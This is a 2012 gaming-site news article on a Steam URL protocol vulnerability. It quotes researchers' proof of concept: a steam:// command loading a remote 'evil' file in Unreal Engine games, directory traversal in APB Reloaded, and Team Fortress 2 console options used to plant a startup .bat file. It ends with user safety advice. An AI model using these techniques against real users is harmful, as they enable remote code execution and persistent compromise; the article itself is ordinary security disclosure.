Guru3D.com
  • HOME
  • NEWS
    • Channels
    • Archive
  • DOWNLOADS
    • New Downloads
    • Categories
    • Archive
  • GAME REVIEWS
  • ARTICLES
    • Rig of the Month
    • Join ROTM
    • PC Buyers Guide
    • Guru3D VGA Charts
    • Editorials
    • Dated content
  • HARDWARE REVIEWS
    • Videocards
    • Processors
    • Audio
    • Motherboards
    • Memory and Flash
    • SSD Storage
    • Chassis
    • Media Players
    • Power Supply
    • Laptop and Mobile
    • Smartphone
    • Networking
    • Keyboard Mouse
    • Cooling
    • Search articles
    • Knowledgebase
    • More Categories
  • FORUMS
  • NEWSLETTER
  • CONTACT

New Reviews
F1 2022: PC graphics performance benchmark review
Fractal Design Focus 2 chassis review
Scythe Mugen 5 Rev.C CPU Cooler review
be quiet Pure Loop 2 FX 280mm LCS review
HP FX900 1 TB NVMe Review
Scythe FUMA2 Rev.B CPU Cooler review
SK Hynix Platinum P41 2TB M.2 NVMe SSD Review
Corsair K70 RGB PRO Mini Wireless review
MSI MPG A1000G - 1000W PSU Review
Goodram IRDM PRO M.2 SSD 2 TB NVMe SSD Review

New Downloads
Corsair Utility Engine Download (iCUE) Download v4.27.168
Download Intel network driver package 27.6
AMD Radeon Software Adrenalin 22.8.1 driver download
Prime95 download version 30.8 build 16
Memtest86 9.5 download
Intel ARC graphics Driver Download Version: 30.0.101.1743
GeForce 516.94 WHQL driver download
Display Driver Uninstaller Download version 18.0.5.4
FurMark Download v1.31
Intel HD graphics Driver Download Version: 31.0.101.3222


New Forum Topics
MSI Afterburner .NET Class Library AMD's Possible Delay Ryzen 7000 to September 27th might be BIOS related I changed my PSU and now mechanical HDD shows warning? NVIDIA GeForce 516.94 WHQL driver download & Discussion Curve Overclocking: are you using it ? Intel Core i9-13900K could get extreme performance mode at 350 Watt TDP Review: F1 2022: PC graphics performance analysis Windows 10 1607 + 516.94 driver for GTX 980 [3rd-Party Driver] Amernime Zone Radeon Release Nemesis 22.6.1 WHQL DriverPack (22.7.1 pending ...) [SKIN] MSIAfterburnerDarkThemeSkinV5 by NOXVIII




Guru3D.com » News » Steam Security Vulnerability Found when Using Certain Browsers

Steam Security Vulnerability Found when Using Certain Browsers

by Steam Security Vulnerability Found when Using Certain Browsers on: 10/18/2012 06:45 AM | source: | 1 comment(s)
Steam Security Vulnerability Found when Using Certain Browsers

TGN reports that some  browsers will execute the steam:// protocol without so much as a single prompt to the user. Chrome, IE, and Firefox will all at least provide prompts to the user, with Chrome providing some more detailed information as to what that URL is attempting to do. The problem can also be found in browsers such as Webkit, MaxThon, Avant, and LunaScape. The fact that some browsers will not give enough information is only part of the problem. The big issue here is that the Steam URL can be used to run games with potentially harmful command line parameters.

See, some browsers will execute the steam:// protocol without so much as a single prompt to the user. Chrome, IE, and Firefox will all at least provide prompts to the user, with Chrome providing some more detailed information as to what that URL is attempting to do. The problem can also be found in browsers such as Webkit, MaxThon, Avant, and LunaScape. Keep in mind that Steam's own internal browser utilizes WebKit for its rendering. Other browsers such as Opera, SeaMonkey, PaleMoon, and SRWare Iron do not provide the detailed explanation that Chrome provides to the user but should at least provide some sort of a prompt.

The fact that some browsers will not give enough information is only part of the problem. The big issue here is that the Steam URL can be used to run games with potentially harmful command line parameters. The hardware and security group responsible for discovering this vulnerability, Revuln, went through a variety of tests to show a proof of concept. Keep in mind that this vulnerability is not limited to Valve's own titles.

Example 1 - Unreal Engine
For games based on the Unreal Engine we opted for exploiting a real security vulnerability that occurs while loading content that resides on remote computers (Windows remote WebDAV or SMB share) which we can load via command-line parameters:

steam://run/ID/server nnHOSTnevil.upk -silent

Indeed this engine is affected by many integer overflow vulnerabilities (maybe we will document them one of these days) that allow execution of malicious code.

Example 2 - APB Reloaded
In this case we decide an arbitrary update server via command-line and exploit a directory traversal for overwriting or creating any file we desire with our custom content.

On Steam there are tons of MMO games free-to-play like APB so the user base is very big and most of them can be exploited with such techniques. Additionally most of these games use anti-cheating solutions and require to be launched with Administrator permissions (we are in the gaming world where people don’t have security knowledge, having such privileges is quite common) so the whole system can be compromised.

Example 3 - Team Fortress 2
Most of them include the basis commands available in the Source engine, which we are going to use for writing files with custom content in arbitrary locations. For exploiting this engine we have opted for the following command-line
options:

 +con_logfile, allows you to specify a file that will receive the content of the console (it can’t be a Windows remote share)

+echo, used to put custom data in the log file

+quit, (optional) closes the game

-hijack, (optional) useful in case the user already has an instance of the game running and we want to send additional commands that are limited by the Q_URLDecode 128 chars

Our choice for exploiting this bug is to create a .bat file in the Startup folder of the user account which will execute our commands injected through +echo at the next login of the user on the system. There is also an interesting scenario against dedicated servers by specifying the motd.txt of the game as logfile and launching the cvarlist command that will dump all the game variables in such file that is visible to any player who joins the server.


These are just three basic examples. A more visual proof of concept can be seen in the video below. To protect yourself, be sure not to click on any links you do not trust. Make sure you look at where the URL is pointing to before clicking, even if it looks safe on the outside, keep an eye on where it's really linking to by hovering over the link ahead of time. Another huge security precaution would be to disable the steam:// URL handler within your browser of choice.



Tagged as: Steam




« Tropico 4 Gold Edition Goes Gold · Steam Security Vulnerability Found when Using Certain Browsers · ZOTAC GeForce GTX 650 Destroyer TSI »

Texter
Senior Member



Posts: 3175
Joined: 2008-11-03

#4433998 Posted on: 10/18/2012 11:24 PM
Had to BLOCK STEAM with Peerblock today to stop Firefox from popping up while I was exiting Deus Ex: IW. Really annoying. Didn't know WTH was going on until I read the 'news'.

Post New Comment
Click here to post a comment for this news story on the message forum.


Guru3D.com © 2022